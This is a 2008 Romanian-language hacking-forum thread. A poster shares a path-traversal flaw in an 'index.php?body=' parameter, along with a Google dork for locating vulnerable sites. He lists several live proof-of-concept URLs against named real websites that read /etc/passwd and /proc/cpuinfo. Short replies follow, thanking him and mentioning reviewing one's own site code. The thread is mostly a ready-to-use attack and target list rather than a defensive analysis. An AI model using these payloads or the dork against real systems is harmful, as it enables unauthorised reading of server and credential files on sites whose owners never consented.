shinnok Posted March 24, 2008 Report Share Posted March 24, 2008 O mica vulnerabilitate cu care m-am distrat in seara asta:- "index.php?body=" este partea vulnerabila.- "../../../../../../../../../../[director]" este ceea ce treb trimis lui body - "inurl:"index.php?body="" este google dorkul care va ajuta sa gasiti hosturi posibil vulnerabile- POC:http://www.exclusivestates.com/index.php?body=../../../../../../../../../../etc/passwdhttp://www.waterqualityplan.org/index.php?BODY=../../../../../../../../../../etc/passwdhttp://gp2.ro/ini/index.php?body=../../../../../../../../../../etc/passwdhttp://gp2.ro/ini/index.php?body=../../../../../../../../../../proc/cpuinfohttp://www.renaissanceink.net/index.php?body=../../../../../../../../../../etc/passwdhttp://www.heritagecovenant.org/index.php?body=../../../../../../../../../../etc/passwdPS:nu stiu de cat timp circula vulnerabilitatea,daca cineva stie sa posteze Quote Link to comment Share on other sites More sharing options...
smartkid007 Posted March 24, 2008 Report Share Posted March 24, 2008 thank Quote Link to comment Share on other sites More sharing options...
indexexplorer Posted March 24, 2008 Report Share Posted March 24, 2008 hmmm... cred ca trebuie sa-mi revizuiesc sursa site-ului...ms Quote Link to comment Share on other sites More sharing options...